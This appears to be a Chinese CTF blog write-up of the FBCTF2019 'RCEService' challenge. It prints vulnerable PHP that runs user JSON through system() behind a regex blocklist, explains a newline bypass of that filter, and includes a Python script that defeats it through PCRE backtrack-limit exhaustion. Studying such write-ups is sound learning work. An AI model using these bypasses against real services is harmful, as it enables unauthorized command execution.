<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="[FBCTF2019]RCEService-PRCE  首先呢，这个题目，是有源代码的： 123456789101112131415161718192021222324&lt;?phpputenv(&#x27;PATH&#x3D;&#x2F;home&#x2F;rceservice&#x2F;jail&#x27;);if (isset($_REQUEST[&#x27;cmd&#x27;])) &#123;  $json &#x3D; $_REQU">
<meta property="og:type" content="article">
<meta property="og:title" content="[FBCTF2019]RCEService-PRCE">
<meta property="og:url" content="http://example.com/2025/01/31/FBCTF2019-RCEService-PRCE/index.html">
<meta property="og:site_name" content="WangYiHao">
<meta property="og:description" content="[FBCTF2019]RCEService-PRCE  首先呢，这个题目，是有源代码的： 123456789101112131415161718192021222324&lt;?phpputenv(&#x27;PATH&#x3D;&#x2F;home&#x2F;rceservice&#x2F;jail&#x27;);if (isset($_REQUEST[&#x27;cmd&#x27;])) &#123;  $json &#x3D; $_REQU">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2025/01/31/FBCTF2019-RCEService-PRCE/1.png">
<meta property="og:image" content="http://example.com/2025/01/31/FBCTF2019-RCEService-PRCE/3.png">
<meta property="og:image" content="http://example.com/2025/01/31/FBCTF2019-RCEService-PRCE/2.png">
<meta property="article:published_time" content="2025-01-31T15:06:40.000Z">
<meta property="article:modified_time" content="2025-01-31T15:22:34.712Z">
<meta property="article:author" content="SunRT">
<meta property="article:tag" content="WEB-CTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2025/01/31/FBCTF2019-RCEService-PRCE/1.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>[FBCTF2019]RCEService-PRCE</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 7.2.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">总览</a></li>
         
          <li><a href="/tags/WEB-CTF/">CTF-WEB</a></li>
         
          <li><a href="/tags/PWN/">CTF-PWN</a></li>
         
          <li><a href="/tags/HACK-MY-VM/">HACK-MY-VM</a></li>
         
          <li><a href="/tags/try-hack-me/">TRY-HACK-ME</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2025/02/01/WUSTCTF2020-%E9%A2%9C%E5%80%BC%E6%88%90%E7%BB%A9%E6%9F%A5%E8%AF%A2/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2025/01/30/Filter%E9%93%BE%E4%B9%8Bphp/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Post Anterior</span>
      <span id="i-next" class="info" style="display:none;">Post Següent</span>
      <span id="i-top" class="info" style="display:none;">Adalt</span>
      <span id="i-share" class="info" style="display:none;">Compartir Post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2025/01/31/FBCTF2019-RCEService-PRCE/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2025/01/31/FBCTF2019-RCEService-PRCE/&text=[FBCTF2019]RCEService-PRCE"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2025/01/31/FBCTF2019-RCEService-PRCE/&title=[FBCTF2019]RCEService-PRCE"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2025/01/31/FBCTF2019-RCEService-PRCE/&is_video=false&description=[FBCTF2019]RCEService-PRCE"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=[FBCTF2019]RCEService-PRCE&body=Check out this article: http://example.com/2025/01/31/FBCTF2019-RCEService-PRCE/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2025/01/31/FBCTF2019-RCEService-PRCE/&title=[FBCTF2019]RCEService-PRCE"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2025/01/31/FBCTF2019-RCEService-PRCE/&title=[FBCTF2019]RCEService-PRCE"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2025/01/31/FBCTF2019-RCEService-PRCE/&title=[FBCTF2019]RCEService-PRCE"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2025/01/31/FBCTF2019-RCEService-PRCE/&title=[FBCTF2019]RCEService-PRCE"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2025/01/31/FBCTF2019-RCEService-PRCE/&name=[FBCTF2019]RCEService-PRCE&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2025/01/31/FBCTF2019-RCEService-PRCE/&t=[FBCTF2019]RCEService-PRCE"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">1.</span> <span class="toc-text">[FBCTF2019]RCEService-PRCE</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        [FBCTF2019]RCEService-PRCE
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">SunRT</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2025-01-31T15:06:40.000Z" itemprop="datePublished">2025-01-31</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/WEB-CTF/" rel="tag">WEB-CTF</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h1>[FBCTF2019]RCEService-PRCE</h1>

<p><strong>首先呢，这个题目，是有源代码的：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">putenv</span>(<span class="string">&#x27;PATH=/home/rceservice/jail&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_REQUEST</span>[<span class="string">&#x27;cmd&#x27;</span>])) &#123;</span><br><span class="line">  <span class="variable">$json</span> = <span class="variable">$_REQUEST</span>[<span class="string">&#x27;cmd&#x27;</span>];</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (!<span class="title function_ invoke__">is_string</span>(<span class="variable">$json</span>)) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;Hacking attempt detected&lt;br/&gt;&lt;br/&gt;&#x27;</span>;</span><br><span class="line">  &#125; <span class="keyword">elseif</span> (<span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/&#x27;</span>, <span class="variable">$json</span>)) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;Hacking attempt detected&lt;br/&gt;&lt;br/&gt;&#x27;</span>;</span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;  </span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;Attempting to run command:&lt;br/&gt;&#x27;</span>;</span><br><span class="line">    <span class="variable">$cmd</span> = <span class="title function_ invoke__">json_decode</span>(<span class="variable">$json</span>, <span class="literal">true</span>)[<span class="string">&#x27;cmd&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span> (<span class="variable">$cmd</span> !== <span class="literal">NULL</span>) &#123;</span><br><span class="line">      <span class="title function_ invoke__">system</span>(<span class="variable">$cmd</span>);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">      <span class="keyword">echo</span> <span class="string">&#x27;Invalid input&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;&lt;br/&gt;&lt;br/&gt;&#x27;</span>;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><strong>这是源代码，过滤的东西多，但是这个匹配不是多行匹配，也就是说可以换行绕过：</strong></p>
<p><img src="/2025/01/31/FBCTF2019-RCEService-PRCE/1.png" alt="1"></p>
<p><strong>所以说，绕过很简单了，但是PATH&#x3D;&#x2F;home&#x2F;rceservice&#x2F;jail 限制我们命令执行的环境，所以使得很多的命令，我们不使用绝对路径是无法执行的，这里我们绝对路径的获取是根据经验，也就是所有机器的命令的默认路径，rev在&#x2F;usr&#x2F;bin&#x2F;rev，cat在&#x2F;bin&#x2F;cat，find在&#x2F;usr&#x2F;bin&#x2F;find，我们先利用不能换行匹配的性质，用find命令搜寻flag</strong></p>
<p><img src="/2025/01/31/FBCTF2019-RCEService-PRCE/3.png" alt="3"></p>
<p><strong>在此之后，我们可以直接读取flag</strong></p>
<p><img src="/2025/01/31/FBCTF2019-RCEService-PRCE/2.png" alt="2"></p>
<p><strong>这是法一，还有法二，利用正则贪婪匹配的回溯机制，因为回溯有次数限制的原因，从而绕过，脚本在pycharm里面：</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> xml.sax <span class="keyword">import</span> parse</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="comment">#回溯用于post请求，get请求会导致414错误</span></span><br><span class="line">url = <span class="string">&quot;http://localhost/2.php&quot;</span> <span class="comment">#可以更换</span></span><br><span class="line"></span><br><span class="line">huisu = <span class="string">&quot;a&quot;</span> * <span class="number">1000001</span></span><br><span class="line">payload = <span class="string">&#x27;&#123;&quot;cmd&quot;:&quot;ipconfig&quot;,&quot;zz&quot;:&quot;&#x27;</span> + <span class="string">&quot;a&quot;</span>*(<span class="number">1000000</span>) + <span class="string">&#x27;&quot;&#125;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#这个payload 由三部分构成</span></span><br><span class="line"><span class="comment">#1.   &#123;&quot;cmd&quot;:&quot;ipconfig&quot;,&quot;zz&quot;:&quot;</span></span><br><span class="line"><span class="comment">#2.   &quot;a&quot;*(1000000)</span></span><br><span class="line"><span class="comment">#3.   &#x27;&quot;&#125;&#x27;</span></span><br><span class="line"><span class="comment">#所以中间是代码</span></span><br><span class="line"></span><br><span class="line">headers = &#123;</span><br><span class="line">    <span class="string">&quot;User-Agent&quot;</span>: <span class="string">&quot;Mozilla/5.0&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Authorization&quot;</span>: <span class="string">&quot;Bearer your_token&quot;</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">response = requests.post(url, data=&#123;<span class="string">&quot;cmd&quot;</span>:payload&#125;, headers=headers)</span><br><span class="line"><span class="built_in">print</span>(response.text)</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><strong>但是这道题目呢，并不能使用这个贪婪匹配的回溯机制，原因就是get请求并不支持一次性输入如此多的文本，导致回溯失败</strong></p>
<p>具体参考:<a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/use-pcre-backtrack-limit-to-bypass-restrict.html">PHP利用PCRE回溯次数限制绕过某些安全限制 | 离别歌</a></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">总览</a></li>
         
          <li><a href="/tags/WEB-CTF/">CTF-WEB</a></li>
         
          <li><a href="/tags/PWN/">CTF-PWN</a></li>
         
          <li><a href="/tags/HACK-MY-VM/">HACK-MY-VM</a></li>
         
          <li><a href="/tags/try-hack-me/">TRY-HACK-ME</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">1.</span> <span class="toc-text">[FBCTF2019]RCEService-PRCE</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2025/01/31/FBCTF2019-RCEService-PRCE/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2025/01/31/FBCTF2019-RCEService-PRCE/&text=[FBCTF2019]RCEService-PRCE"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2025/01/31/FBCTF2019-RCEService-PRCE/&title=[FBCTF2019]RCEService-PRCE"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2025/01/31/FBCTF2019-RCEService-PRCE/&is_video=false&description=[FBCTF2019]RCEService-PRCE"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=[FBCTF2019]RCEService-PRCE&body=Check out this article: http://example.com/2025/01/31/FBCTF2019-RCEService-PRCE/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2025/01/31/FBCTF2019-RCEService-PRCE/&title=[FBCTF2019]RCEService-PRCE"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2025/01/31/FBCTF2019-RCEService-PRCE/&title=[FBCTF2019]RCEService-PRCE"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2025/01/31/FBCTF2019-RCEService-PRCE/&title=[FBCTF2019]RCEService-PRCE"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2025/01/31/FBCTF2019-RCEService-PRCE/&title=[FBCTF2019]RCEService-PRCE"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2025/01/31/FBCTF2019-RCEService-PRCE/&name=[FBCTF2019]RCEService-PRCE&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2025/01/31/FBCTF2019-RCEService-PRCE/&t=[FBCTF2019]RCEService-PRCE"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menú</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Compartir</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Cap amunt</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2025
    SunRT
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">总览</a></li>
         
          <li><a href="/tags/WEB-CTF/">CTF-WEB</a></li>
         
          <li><a href="/tags/PWN/">CTF-PWN</a></li>
         
          <li><a href="/tags/HACK-MY-VM/">HACK-MY-VM</a></li>
         
          <li><a href="/tags/try-hack-me/">TRY-HACK-ME</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->


</body>
</html>
